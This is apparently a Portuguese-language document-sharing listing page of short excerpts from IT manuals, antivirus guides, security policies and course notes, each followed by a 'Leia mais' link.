Microsoft Windows 7 / Vista / XP / 2000 / Home Server. Guia de Inicialização Rápida

Microsoft Windows 7 / Vista / XP / 2000 / Home Server. Guia de Inicialização Rápida Microsoft Windows 7 / Vista / XP / 2000 / Home Server Guia de Inicialização Rápida O ESET Smart Security fornece proteção de última geração para o seu computador contra código malicioso. Com base no ThreatSense,

Leia mais

HP Mobile Printing para Pocket PC

HP Mobile Printing para Pocket PC HP Mobile Printing para Pocket PC Guia de Iniciação Rápida O HP Mobile Printing para Pocket PC permite imprimir mensagens de e-mail, anexos e arquivos em uma impressora Bluetooth, de infravermelho ou de

Leia mais

Soluções em Segurança

Soluções em Segurança Desafios das empresas no que se refere a segurança da infraestrutura de TI Dificuldade de entender os riscos aos quais a empresa está exposta na internet Risco de problemas gerados por ameaças externas

Leia mais

Novell Teaming 2.0. Novell. 29 de julho de 2009. Início Rápido. Iniciando o Novell Teaming. Conhecendo a interface do Novell Teaming e seus recursos

Novell Teaming 2.0. Novell. 29 de julho de 2009. Início Rápido. Iniciando o Novell Teaming. Conhecendo a interface do Novell Teaming e seus recursos Novell Teaming 2.0 29 de julho de 2009 Novell Início Rápido Quando você começa a usar o Novell Teaming, a primeira coisa a se fazer é configurar sua área de trabalho pessoal e criar uma área de trabalho

Leia mais

EXIN Cloud Computing Fundamentos

EXIN Cloud Computing Fundamentos Exame Simulado EXIN Cloud Computing Fundamentos Edição Maio 2013 Copyright 2013 EXIN Todos os direitos reservados. Nenhuma parte desta publicação pode ser publicado, reproduzido, copiado ou armazenada

Leia mais

Manual do aplicativo Conexão ao telefone

Manual do aplicativo Conexão ao telefone Manual do aplicativo Conexão ao telefone Copyright 2003 Palm, Inc. Todos os direitos reservados. O logotipo da Palm e HotSync são marcas registradas da Palm, Inc. O logotipo da HotSync e Palm são marcas

Leia mais

Norton 360 Online Guia do Usuário

Norton 360 Online Guia do Usuário Guia do Usuário Norton 360 Online Guia do Usuário Documentação versão 1.0 Copyright 2007 Symantec Corporation. Todos os direitos reservados. O software licenciado e a documentação são considerados software

Leia mais

Prof. Jefferson Costa www.jeffersoncosta.com.br

Prof. Jefferson Costa www.jeffersoncosta.com.br Prof. Jefferson Costa www.jeffersoncosta.com.br Preservação da: confidencialidade: Garantia de que o acesso à informação seja obtido somente por pessoas autorizadas. integridade: Salvaguarda da exatidão

Leia mais

Consulte a parte de trás para obter informações sobre instalação rápida.

Consulte a parte de trás para obter informações sobre instalação rápida. Guia do Usuário Consulte a parte de trás para obter informações sobre instalação rápida. Protegemos mais usuários contra ameaças on-line do que qualquer outra empresa no mundo. Cuidar de nosso meio ambiente,

Leia mais

SOLUÇÕES DE RESILIÊNCIA E SEGURANÇA

SOLUÇÕES DE RESILIÊNCIA E SEGURANÇA SERVIÇO DE RESPOSTA A INCIDENTES D Solução de segurança que fornece orientações para o efetivo controle ou correção de ataques externos causados por vulnerabilidades encontradas no ambiente do cliente.

Leia mais

AVDS Vulnerability Management System

AVDS Vulnerability Management System DATA: Agosto, 2012 AVDS Vulnerability Management System White Paper Brazil Introdução Beyond Security tem o prazer de apresentar a nossa solução para Gestão Automática de Vulnerabilidade na núvem. Como

Leia mais

Guia do Usuário do Gateway do Avigilon Control Center

Guia do Usuário do Gateway do Avigilon Control Center Guia do Usuário do Gateway do Avigilon Control Center Versão: 5.2 PDF-ACCGATEWAY5-B-Rev1_PT 2013 2014 Avigilon Corporation. Todos os direitos reservados. A menos que expressamente concedida por escrito,

Leia mais

Inicialização Rápida do Novell Vibe Mobile

Inicialização Rápida do Novell Vibe Mobile Inicialização Rápida do Novell Vibe Mobile Março de 2015 Introdução O acesso móvel ao site do Novell Vibe pode ser desativado por seu administrador do Vibe. Se não conseguir acessar a interface móvel do

Leia mais

Guia de Inicialização para o Windows

Guia de Inicialização para o Windows Intralinks VIA Versão 2.0 Guia de Inicialização para o Windows Suporte 24/7/365 da Intralinks EUA: +1 212 543 7800 Reino Unido: +44 (0) 20 7623 8500 Consulte a página de logon da Intralinks para obter

Leia mais

TEORIA GERAL DE SISTEMAS

TEORIA GERAL DE SISTEMAS TEORIA GERAL DE SISTEMAS Vulnerabilidade dos sistemas e uso indevido Vulnerabilidade do software Softwares comerciais contém falhas que criam vulnerabilidades na segurança Bugs escondidos (defeitos no

Leia mais

CA Nimsoft Monitor Mobile

CA Nimsoft Monitor Mobile CA Nimsoft Monitor Mobile Guia do Usuário 7.0 Histórico da revisão do documento Versão do documento Data Alterações 1.0 Setembro 2013 Versão inicial do Nimsoft Mobile 7.0. Avisos legais Copyright 2013,

Leia mais

Norton Internet Security Guia do Usuário

Norton Internet Security Guia do Usuário Guia do Usuário Norton Internet Security Guia do Usuário O software descrito neste guia é fornecido sob um contrato de licença e pode ser usado somente conforme os termos do contrato. Documentação versão

Leia mais

Detecção e investigação de ameaças avançadas. VISÃO GERAL

Detecção e investigação de ameaças avançadas. VISÃO GERAL Detecção e investigação de ameaças avançadas. VISÃO GERAL DESTAQUES Introdução ao RSA Security Analytics, que oferece: Monitoramento da segurança Investigação de incidente Geração de relatórios de conformidade

Leia mais

Cartilha de Segurança para Internet

Cartilha de Segurança para Internet Comitê Gestor da Internet no Brasil Cartilha de Segurança para Internet Parte VII: Incidentes de Segurança e Uso Abusivo da Rede Versão 3.1 2006 CERT.br Centro de Estudos, Resposta e Tratamento de Incidentes

Leia mais

POLÍTICA DE PRIVACIDADE CONSULTOR HND

POLÍTICA DE PRIVACIDADE CONSULTOR HND POLÍTICA DE PRIVACIDADE CONSULTOR HND 1. Princípios Gerais Esta Política de privacidade descreve como o CONSULTOR HND coleta e usa informações pessoais fornecidas no nosso site: www.consultorhnd.com.br.

Leia mais

ADOBE FLASH PLAYER 10.3 Gerenciador de configurações locais

ADOBE FLASH PLAYER 10.3 Gerenciador de configurações locais ADOBE FLASH PLAYER 10.3 Gerenciador de configurações locais PRERELEASE 03/07/2011 Avisos legais Avisos legais Para consultar avisos legais, acesse o site http://help.adobe.com/pt_br/legalnotices/index.html.

Leia mais

Estratégias para avaliação da segurança da computação em nuvens

Estratégias para avaliação da segurança da computação em nuvens Academia de Tecnologia da IBM White paper de liderança de pensamento Novembro de 2010 Estratégias para avaliação da segurança da computação em nuvens 2 Proteção da nuvem: do desenvolvimento da estratégia

Leia mais

Escritório Digital. Perguntas frequentes. Perguntas gerais

Escritório Digital. Perguntas frequentes. Perguntas gerais Escritório Digital Perguntas frequentes Perguntas gerais O que é o Escritório Digital? O Escritório Digital é um software desenvolvido pelo CNJ em parceria com a OAB para integrar os diferentes sistemas

Leia mais

Proteger as informações da empresa para a qual trabalhamos é um dever de todos nós!

Proteger as informações da empresa para a qual trabalhamos é um dever de todos nós! Prezado Colaborador, O conteúdo desta cartilha tem como objetivo compartilhar alguns conceitos relacionados ao tema Segurança da Informação. Além de dicas de como tratar os recursos e as informações corporativas

Leia mais

Tutorial para acesso ao Peticionamento Eletrônico e Visualização de Processos Eletrônicos

Tutorial para acesso ao Peticionamento Eletrônico e Visualização de Processos Eletrônicos Tutorial para acesso ao Peticionamento Eletrônico e Visualização de Processos Eletrônicos Este tutorial visa preparar o computador com os softwares necessários para a utilização dos sistemas de visualização

Leia mais

SMART Sync 2010 Guia prático

SMART Sync 2010 Guia prático SMART Sync 2010 Guia prático Simplificando o extraordinário Registro do produto Se você registrar o seu produto SMART, receberá notificações sobre novos recursos e atualizações de software. Registre-se

Leia mais

Guia De Criptografia

Guia De Criptografia Guia De Criptografia Perguntas e repostas sobre a criptografia da informação pessoal Guia para aprender a criptografar sua informação. 2 O que estamos protegendo? Através da criptografia protegemos fotos,

Leia mais

Segurança Internet. Fernando Albuquerque. fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589

Segurança Internet. Fernando Albuquerque. fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589 Segurança Internet Fernando Albuquerque fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589 Tópicos Introdução Autenticação Controle da configuração Registro dos acessos Firewalls Backups

Leia mais

Otimização do Gerenciamento de Datacenters com o Microsoft System Center

Otimização do Gerenciamento de Datacenters com o Microsoft System Center Otimização do Gerenciamento de Datacenters com o Microsoft System Center Aviso de Isenção de Responsabilidade e Direitos Autorais As informações contidas neste documento representam a visão atual da Microsoft

Leia mais

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo

Leia mais

Tableau Online Segurança na nuvem

Tableau Online Segurança na nuvem Tableau Online Segurança na nuvem Autor(a): Ellie Fields Diretora Sênior de Marketing de Produtos, Tableau Software Junho de 2013 p2 A Tableau Software entende que os dados são um dos ativos mais estratégicos

Leia mais

Manual de instalação, configuração e utilização do Assinador Betha

Manual de instalação, configuração e utilização do Assinador Betha Manual de instalação, configuração e utilização do Assinador Betha Versão 1.5 Histórico de revisões Revisão Data Descrição da alteração 1.0 18/09/2015 Criação deste manual 1.1 22/09/2015 Incluído novas

Leia mais

Kaspersky Anti-Virus 2013 Kaspersky Internet Security 2013 Lista de novos recursos

Kaspersky Anti-Virus 2013 Kaspersky Internet Security 2013 Lista de novos recursos Kaspersky Anti-Virus 2013 Kaspersky Internet Security 2013 Lista de novos recursos Sumário Visão geral de novos recursos 2 Instalação, ativação, licenciamento 2 Internet Security 3 Proteção Avançada 4

Leia mais

Identificação rápida de gargalos Uma forma mais eficiente de realizar testes de carga. Um artigo técnico da Oracle Junho de 2009

Identificação rápida de gargalos Uma forma mais eficiente de realizar testes de carga. Um artigo técnico da Oracle Junho de 2009 Identificação rápida de gargalos Uma forma mais eficiente de realizar testes de carga Um artigo técnico da Oracle Junho de 2009 Identificação rápida de gargalos Uma forma mais eficiente de realizar testes

Leia mais

Controles gerais iguais aos de pacotes de softwares: Instalação, Configuração, Manutenção, Utilitários.

Controles gerais iguais aos de pacotes de softwares: Instalação, Configuração, Manutenção, Utilitários. $XWDUTXLD(GXFDFLRQDOGR9DOHGR6mR)UDQFLVFR± $(96) )DFXOGDGHGH&LrQFLDV6RFLDLVH$SOLFDGDVGH3HWUROLQD± )$&$3( &XUVRGH&LrQFLDVGD&RPSXWDomR $8',725,$'$7(&12/2*,$'$,1)250$d 2 &RQWUROHVVREUHEDQFRGHGDGRVH PLFURFRPSXWDGRUHV

Leia mais

Copyright 2013 Academia NED. Todos os Direitos Reservados. AcademiaNED.com.br

Copyright 2013 Academia NED. Todos os Direitos Reservados. AcademiaNED.com.br Copyright 2013 Academia NED Todos os Direitos Reservados AcademiaNED.com.br CONTEÚDO Introdução... 4 1 - Certifique-se de que sua FanPage é atraente... 5 a. Foto de Capa... 5 b. Foto de Perfil... 5 c.

Leia mais

Código de prática para a gestão da segurança da informação

Código de prática para a gestão da segurança da informação Código de prática para a gestão da segurança da informação Edição e Produção: Fabiano Rabaneda Advogado, professor da Universidade Federal do Mato Grosso. Especializando em Direito Eletrônico e Tecnologia

Leia mais

Segurança + Conformidade. Dentro do Prazo e Orçamento Previsto Sob Demanda

Segurança + Conformidade. Dentro do Prazo e Orçamento Previsto Sob Demanda Segurança + Conformidade Dentro do Prazo e Orçamento Previsto Sob Demanda Segurança e Conformidade via Software-as-a-Service (SaaS) Hoje em dia, é essencial para as empresas administrarem riscos de segurança

Leia mais

A ISO 17799 esta dividida em 12 seções da seguinte forma: 1. Objetivo da norma. 2. Termos e definições: 3. Poĺıtica de segurança.

A ISO 17799 esta dividida em 12 seções da seguinte forma: 1. Objetivo da norma. 2. Termos e definições: 3. Poĺıtica de segurança. A 17799 se refere a mecanismos organizacionais para garantir a segurança da informação. Não é uma norma que define aspectos técnicos de nenhuma forma, nem define as características de segurança de sistemas,

Leia mais

Consulte a parte de trás para obter informações sobre instalação rápida.

Consulte a parte de trás para obter informações sobre instalação rápida. Guia do Usuário Consulte a parte de trás para obter informações sobre instalação rápida. Protegemos mais usuários contra ameaças on-line do que qualquer outra empresa no mundo. Cuidar de nosso meio ambiente,

Leia mais

Gestão de T.I. GESTÃO DE T.I. ITIL. José Luís Padovan jlpadovan@gmail.com

Gestão de T.I. GESTÃO DE T.I. ITIL. José Luís Padovan jlpadovan@gmail.com GESTÃO DE T.I. José Luís Padovan jlpadovan@gmail.com 1 Information Technology Infrastructure Library 2 O que é o? Information Technology Infrastructure Library é uma biblioteca composta por sete livros

Leia mais

Curso de Tecnologia em Redes de Computadores Auditoria e Análise de Segurança da Informação - 4º período Professor: José Maurício S.

Curso de Tecnologia em Redes de Computadores Auditoria e Análise de Segurança da Informação - 4º período Professor: José Maurício S. Disciplina: Curso de Tecnologia em Redes de Computadores Auditoria e Análise de Segurança da Informação - 4º período Professor: José Maurício S. Pinheiro AULA 4: Trilhas de Auditoria Existe a necessidade

Leia mais

Quais tipos de informações nós obteremos para este produto

Quais tipos de informações nós obteremos para este produto Termos de Uso O aplicativo Claro Facilidades faz uso de mensagens de texto (SMS), mensagens publicitárias e de serviços de internet. Nos casos em que houver uso de um serviço tarifado como, por exemplo,

Leia mais

GESTÃO DE TI NAS ORGANIZAÇÕES CONTEMPORÂNEAS

GESTÃO DE TI NAS ORGANIZAÇÕES CONTEMPORÂNEAS GESTÃO DE TI NAS ORGANIZAÇÕES CONTEMPORÂNEAS WALLACE BORGES CRISTO 1 JOÃO CARLOS PEIXOTO FERREIRA 2 João Paulo Coelho Furtado 3 RESUMO A Tecnologia da Informação (TI) está presente em todas as áreas de

Leia mais

RESUMO DA SOLUÇÃO Aperfeiçoando o planejamento de capacidade com o uso do gerenciamento de desempenho de aplicativos

RESUMO DA SOLUÇÃO Aperfeiçoando o planejamento de capacidade com o uso do gerenciamento de desempenho de aplicativos RESUMO DA SOLUÇÃO Aperfeiçoando o planejamento de capacidade com o uso do gerenciamento de desempenho de aplicativos como posso assegurar uma experiência excepcional para o usuário final com aplicativos

Leia mais

Manual do Usuário Cyber Square

Manual do Usuário Cyber Square Manual do Usuário Cyber Square Criado dia 27 de março de 2015 as 12:14 Página 1 de 48 Bem-vindo ao Cyber Square Parabéns! Você está utilizando o Cyber Square, o mais avançado sistema para gerenciamento

Leia mais

ESET SMART SECURITY 7

ESET SMART SECURITY 7 ESET SMART SECURITY 7 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guia de Inicialização Rápida Clique aqui para fazer download da versão mais recente deste documento

Leia mais

Implementação do Office365. O365 Migração de usuários. Preparado por: Edilson Alves da Nóbrega Divisão de Informática Administração Central

Implementação do Office365. O365 Migração de usuários. Preparado por: Edilson Alves da Nóbrega Divisão de Informática Administração Central Implementação do Office365 O365 Migração de usuários Preparado por: Edilson Alves da Nóbrega Divisão de Informática Administração Central Abril de 2015 Controle de Versões Registro Data Autor Versão Histórico

Leia mais

O que há de novo no PaperPort 12? O PaperPort 12 possui uma grande variedade de novos e valiosos recursos que ajudam a gerenciar seus documentos.

O que há de novo no PaperPort 12? O PaperPort 12 possui uma grande variedade de novos e valiosos recursos que ajudam a gerenciar seus documentos. Bem-vindo! O Nuance PaperPort é um pacote de aplicativos para gerenciamento de documentos da área de trabalho que ajuda o usuário a digitalizar, organizar, acessar, compartilhar e gerenciar documentos

Leia mais

C O B I T. Gerenciamento dos Riscos Mitigação. Aceitação. Transferência. Evitar/Eliminar.

C O B I T. Gerenciamento dos Riscos Mitigação. Aceitação. Transferência. Evitar/Eliminar. C O B I T Evolução Estratégica A) Provedor de Tecnologia Gerenciamento de Infra-estrutura de TI (ITIM) B) Provedor de Serviços Gerenciamento de Serviços de TI (ITSM) C) Parceiro Estratégico Governança

Leia mais

FERRAMENTAS DE COLABORAÇÃO CORPORATIVA

FERRAMENTAS DE COLABORAÇÃO CORPORATIVA FERRAMENTAS DE COLABORAÇÃO CORPORATIVA Manual de Utilização Google Grupos Sumário (Clique sobre a opção desejada para ir direto à página correspondente) Utilização do Google Grupos Introdução... 3 Página

Leia mais

Channel. Visão Geral e Navegação. Tutorial. Atualizado com a versão 3.9

Channel. Visão Geral e Navegação. Tutorial. Atualizado com a versão 3.9 Channel Visão Geral e Navegação Tutorial Atualizado com a versão 3.9 Copyright 2009 por JExperts Tecnologia Ltda. todos direitos reservados. É proibida a reprodução deste manual sem autorização prévia

Leia mais

Contrato de Serviços Abreuhost

Contrato de Serviços Abreuhost Contrato de Serviços Abreuhost Atualizado em 11 de junho de 2014 Obrigado por escolher o Abreuhost Este é um Contrato entre você e a Abreuhost (ou com base em seu local de residência, uma de suas afiliadas)

Leia mais

Aula 12 Lista de verificação de segurança para o Windows 7

Aula 12 Lista de verificação de segurança para o Windows 7 Aula 12 Lista de verificação de segurança para o Windows 7 Use esta lista de verificação para ter certeza de que você está aproveitando todas as formas oferecidas pelo Windows para ajudar a manter o seu

Leia mais

Segurança do SharePoint em ação: melhores práticas orientam a colaboração segura. agility made possible

Segurança do SharePoint em ação: melhores práticas orientam a colaboração segura. agility made possible Segurança do SharePoint em ação: melhores práticas orientam a colaboração segura agility made possible Um dos aplicativos mais amplamente implantados em uso atualmente, o Microsoft SharePoint Server, conquistou

Leia mais

Este livro é protegido pela Lei do direito autoral. Todos os direitos reservados. Nenhuma parte desta publicação pode ser reproduzida, transmitida,

Este livro é protegido pela Lei do direito autoral. Todos os direitos reservados. Nenhuma parte desta publicação pode ser reproduzida, transmitida, Este livro é protegido pela Lei do direito autoral. Todos os direitos reservados. Nenhuma parte desta publicação pode ser reproduzida, transmitida, modificada, distribuída, por qualquer meio, seja eletrônico,

Leia mais

Proteção de ambientes Citrix XenServer com Arcserve

Proteção de ambientes Citrix XenServer com Arcserve Proteção de ambientes Citrix XenServer com Arcserve Desafios do cliente Hoje em dia, você enfrenta desafios como acordos de nível de serviço exigentes e limitações de equipe e orçamento. Você procura maneiras

Leia mais

CA ARCserve Backup PERGUNTAS MAIS FREQUENTES: ARCSERVE BACKUP R12.5

CA ARCserve Backup PERGUNTAS MAIS FREQUENTES: ARCSERVE BACKUP R12.5 PERGUNTAS MAIS FREQUENTES: ARCSERVE BACKUP R12.5 CA ARCserve Backup Este documento aborda as perguntas mais freqüentes sobre o CA ARCserve Backup r12.5. Para detalhes adicionais sobre os novos recursos

Leia mais

Política de uso de dados

Política de uso de dados Política de uso de dados A política de dados ajudará você a entender como funciona as informações completadas na sua área Minhas Festas. I. Informações que recebemos e como são usadas Suas informações

Leia mais

StorageTek Tape Analytics

StorageTek Tape Analytics StorageTek Tape Analytics Guia de Segurança Versão 2.1 E60953-01 Janeiro de 2015 StorageTek Tape Analytics Guia de Segurança E60953-01 Copyright 2012, 2015, Oracle e/ou suas empresas afiliadas. Todos os

Leia mais

Especificações da oferta Remote Infrastructure Monitoring

Especificações da oferta Remote Infrastructure Monitoring Visão geral do Serviço Especificações da oferta Remote Infrastructure Monitoring Este serviço oferece o Dell Remote Infrastructure Monitoring ("Serviço" ou "Serviços" RIM), como apresentado mais especificamente

Leia mais

Qlik Sense Desktop. Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados.

Qlik Sense Desktop. Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados. Qlik Sense Desktop Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados. Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados. Qlik, QlikTech,

Leia mais

Cliente de Acesso MicroWay. MicroWay Access Client - MWAC

Cliente de Acesso MicroWay. MicroWay Access Client - MWAC Cliente de Acesso MicroWay MicroWay Access Client - MWAC Março 2009 Cliente de Acesso MicroWay MicroWay Access Client (MWAC) Copyright 2009, MicroWay Franchising. Todos os direitos reservados. Legenda

Leia mais

ANDRÉ ALENCAR 1 INFORMÁTICA INTERNET EXPLORER 9

ANDRÉ ALENCAR 1 INFORMÁTICA INTERNET EXPLORER 9 ANDRÉ ALENCAR 1 INFORMÁTICA INTERNET EXPLORER 9 1. JANELA PADRÃO Importante: O Internet Explorer não pode ser instalado no Windows XP. 2. INTERFACE MINIMALISTA Seguindo uma tendência já adotada por outros

Leia mais

Requisitos de business intelligence para TI: O que todo gerente de TI deve saber sobre as necessidades reais de usuários comerciais para BI

Requisitos de business intelligence para TI: O que todo gerente de TI deve saber sobre as necessidades reais de usuários comerciais para BI Requisitos de business intelligence para TI: O que todo gerente de TI deve saber sobre as necessidades reais de usuários comerciais para BI Janeiro de 2011 p2 Usuários comerciais e organizações precisam

Leia mais

Guia de administração. BlackBerry Professional Software para Microsoft Exchange. Versão: 4.1 Service pack: 4B

Guia de administração. BlackBerry Professional Software para Microsoft Exchange. Versão: 4.1 Service pack: 4B BlackBerry Professional Software para Microsoft Exchange Versão: 4.1 Service pack: 4B SWD-313211-0911044452-012 Conteúdo 1 Gerenciando contas de usuários... 7 Adicionar uma conta de usuário... 7 Adicionar

Leia mais

Introdução. O que é Serviços de Terminal

Introdução. O que é Serviços de Terminal Introdução Microsoft Terminal Services e Citrix MetaFrame tornaram-se a indústria padrões para fornecer acesso de cliente thin para rede de área local (LAN), com base aplicações. Com o lançamento do MAS

Leia mais

CA Business Service Insight

CA Business Service Insight CA Business Service Insight Guia do Business Relationship View 8.2 A presente documentação, que inclui os sistemas de ajuda incorporados e os materiais distribuídos eletronicamente (doravante denominada

Leia mais

Segurança de Dados. Relatório de Segurança de Dados, Inteligência de Mercado

Segurança de Dados. Relatório de Segurança de Dados, Inteligência de Mercado Segurança de Dados Segurança de dados e sigilo de informações ainda é um tema longe de ser solucionado no Brasil e no Mundo. A cada novo dispositivo lançado, cada nova transação bancária ou a cada novo

Leia mais

Universidade de São Paulo Centro de Informática de Ribeirão Preto TUTORIAL HOTMAIL

Universidade de São Paulo Centro de Informática de Ribeirão Preto TUTORIAL HOTMAIL Universidade de São Paulo Centro de Informática de Ribeirão Preto TUTORIAL HOTMAIL Tutorial Hotmail Sobre o MSN Hotmail Acessando o Hotmail Como criar uma conta Efetuando o login Verificar mensagens Redigir

Leia mais

MDaemon GroupWare. Versão 1 Manual do Usuário. plugin para o Microsoft Outlook. Trabalhe em Equipe Usando o Outlook e o MDaemon

MDaemon GroupWare. Versão 1 Manual do Usuário. plugin para o Microsoft Outlook. Trabalhe em Equipe Usando o Outlook e o MDaemon MDaemon GroupWare plugin para o Microsoft Outlook Trabalhe em Equipe Usando o Outlook e o MDaemon Versão 1 Manual do Usuário MDaemon GroupWare Plugin for Microsoft Outlook Conteúdo 2003 Alt-N Technologies.

Leia mais

Bem vindo ao CURSO DE FRANCÊS ONLINE, um Website pertencente ao Instituto de Estudos Franceses e Europeus de São Paulo Ltda (IFESP).

Bem vindo ao CURSO DE FRANCÊS ONLINE, um Website pertencente ao Instituto de Estudos Franceses e Europeus de São Paulo Ltda (IFESP). BEM VINDO Bem vindo ao CURSO DE FRANCÊS ONLINE, um Website pertencente ao Instituto de Estudos Franceses e Europeus de São Paulo Ltda (IFESP). Essa Política de Privacidade foi elaborada para lhe informar

Leia mais

SOLO NETWORK (11) 4062-6971 (21) 4062-6971 (31) 4062-6971 (41) 4062-6971 (48) 4062-6971 (51) 4062-6971 (61) 4062-6971

SOLO NETWORK (11) 4062-6971 (21) 4062-6971 (31) 4062-6971 (41) 4062-6971 (48) 4062-6971 (51) 4062-6971 (61) 4062-6971 Índice Perguntas & Respostas do Programa Autodesk Subscription Clique para seguir o link 1. Visão Geral... 3 1.1 O que é o Programa Autodesk Subscription?... 3 1.2 A quem destina-se o Programa Autodesk

Leia mais

O Firewall do Windows vem incorporado ao Windows e é ativado automaticamente.

O Firewall do Windows vem incorporado ao Windows e é ativado automaticamente. Noções básicas sobre segurança e computação segura Se você se conecta à Internet, permite que outras pessoas usem seu computador ou compartilha arquivos com outros, deve tomar algumas medidas para proteger

Leia mais

PAINEL MANDIC CLOUD. Mandic. Somos Especialistas em Cloud. Manual do Usuário

PAINEL MANDIC CLOUD. Mandic. Somos Especialistas em Cloud. Manual do Usuário Mandic. Somos Especialistas em Cloud. PAINEL MANDIC CLOUD Manual do Usuário 1 BEM-VINDO AO SEU PAINEL DE CONTROLE ESTE MANUAL É DESTINADO AO USO DOS CLIENTES DA MANDIC CLOUD SOLUTIONS COM A CONTRATAÇÃO

Leia mais

Contato: Kaspersky Lab ZAO 39A/3 Leningradskoe Shosse, Moscou 125212, Rússia E-mail: info@kaspersky.com

Contato: Kaspersky Lab ZAO 39A/3 Leningradskoe Shosse, Moscou 125212, Rússia E-mail: info@kaspersky.com Contato: Kaspersky Lab ZAO 39A/3 Leningradskoe Shosse, Moscou 125212, Rússia E-mail: info@kaspersky.com Suporte: http://support.kaspersky.com Informações gerais: www.kaspersky.com www.securelist.com 2013

Leia mais

Manual do Aplicativo - Rastreamento Veicular

Manual do Aplicativo - Rastreamento Veicular Manual do Aplicativo - Rastreamento Veicular Sumário Apresentação... 2 Instalação do Aplicativo... 2 Localizando o aplicativo no smartphone... 5 Inserindo o link da aplicação... 6 Acessando o sistema...

Leia mais